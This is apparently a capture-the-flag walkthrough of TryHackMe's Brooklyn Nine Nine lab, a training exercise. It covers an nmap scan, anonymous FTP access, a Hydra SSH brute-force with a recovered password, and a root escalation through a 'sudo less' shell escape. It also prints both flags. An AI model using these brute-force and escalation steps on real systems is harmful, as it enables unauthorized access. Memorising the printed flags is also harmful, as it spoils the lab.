tryhackme.com - © TryHackMe
🎯 Target IP: 10.10.218.233
Create a directory for machine on the Desktop and a directory containing the scans with nmap.
su
echo "10.10.218.233 brooklyn.thm" >> /etc/hosts
mkdir thm/brooklyn.thm
cd thm/brooklyn.thm
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hostsI prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
PING brooklyn.thm (10.10.218.233) 56(84) bytes of data.
64 bytes from brooklyn.thm (10.10.218.233): icmp_seq=1 ttl=63 time=61.1 ms
64 bytes from brooklyn.thm (10.10.218.233): icmp_seq=2 ttl=63 time=61.5 ms
64 bytes from brooklyn.thm (10.10.218.233): icmp_seq=3 ttl=63 time=60.6 msSending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix system (probably Linux), while Windows systems usually have a TTL of 128 secs.
nmap --open brooklyn.thmStarting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 15:36 EDT
Nmap scan report for brooklyn.thm (10.10.218.233)
Host is up (0.068s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open httpnmap -p21,22,80 -sV -sC -n -Pn brooklyn.thmStarting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 16:08 EDT
Nmap scan report for brooklyn.thm (10.10.218.233)
Host is up (0.073s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.80.228
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We found a good info: ftp-anon: Anonymous FTP login allowed (FTP code 230), but first we check the port 80.
.png)
inspecting source code we found this message:
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
height: 100%;
margin: 0;
}
.bg {
/* The image used */
background-image: url("brooklyn99.jpg");
/* Full height */
height: 100%;
/* Center and scale the image nicely */
background-position: center;
background-repeat: no-repeat;
background-size: cover;
}
</style>
</head>
<body>
<div class="bg"></div>
<p>This example creates a full page background image. Try to resize the browser window to see how it always will cover the full screen (when scrolled to top), and that it scales nicely on all screen sizes.</p>
<!-- Have you ever heard of steganography? -->
</body>
</html>{% hint style="info" %}
Have you ever heard of steganography?
{% endhint %}
After this, we try to access with ftp
ftp brooklyn.thm
Connected to brooklyn.thm.
220 (vsFTPd 3.0.3)
Name (brooklyn.thm:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.We can use anonymous login (without psw)
ftp> ls
229 Entering Extended Passive Mode (|||21186|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
229 Entering Extended Passive Mode (|||16727|)
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
100% |*************************************************************************************| 119 14.56 KiB/s 00:00 ETA
226 Transfer complete.
119 bytes received in 00:00 (1.67 KiB/s)In the current directory there's a file: note_to_jake.txt, we get it to read it.
From Amy,
Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nineit's another great indication, we know that there's a user: Jake with a weak password.
We use brute force tool: Hydra with parameters: Jake and dictionary (rockyou).
hydra -l jake -P /usr/share/wordlists/rockyou.txt brooklyn.thm sshHydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-24 05:56:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://brooklyn.thm:22/
[22][ssh] host: brooklyn.thm login: jake password: 987654321{% hint style="info" %} jake::987654321 {% endhint %}
We can use the credentials obtained for ssh access:
ssh [email protected]
[email protected]'s password:
Last login: Tue May 26 08:56:58 2020jake@brookly_nine_nine:~$ pwd
/home/jake
jake@brookly_nine_nine:~$ whoami
jake
jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ cd ..
jake@brookly_nine_nine:/home$ ls
amy holt jake
jake@brookly_nine_nine:/home$ cd holt
jake@brookly_nine_nine:/home/holt$ ls
nano.save user.txt
jake@brookly_nine_nine:/home/holt$ cat user.txt🚩 Flag 1 (user.txt)
ee11cbb19052e40b07aac0ca060c23ee
Now, we need to get root permissions to explore the root folder.
We can use the following command to list SUID files or sudo -l command:
find / -user root -perm -4000 -exec ls -ldb {} \;
find: ‘/run/systemd/unit-root’: Permission denied
find: ‘/run/systemd/inaccessible’: Permission denied
find: ‘/run/lock/lvm’: Permission denied
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-sr-x 1 root root 109432 Oct 30 2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 43088 Jan 8 2020 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 170760 Dec 1 2017 /bin/less
-rwsr-xr-x 1 root root 26696 Jan 8 2020 /bin/umount/bin/less stands out, We can use script of this website to became a root, in this case we choose less process: https://gtfobins.github.io/gtfobins/less/
sudo less /etc/profile
!/bin/shjake@brookly_nine_nine:/$ sudo less /etc/profile
# whoami
rootNow, we're root!
# ls
bin cdrom etc initrd.img lib lost+found mnt proc run snap sys usr vmlinuz
boot dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old
# cd root
# ls
root.txt
# cat root.txt🚩 Flag 2 (root.txt)
63a9f0ea7bb98050796b649e85481845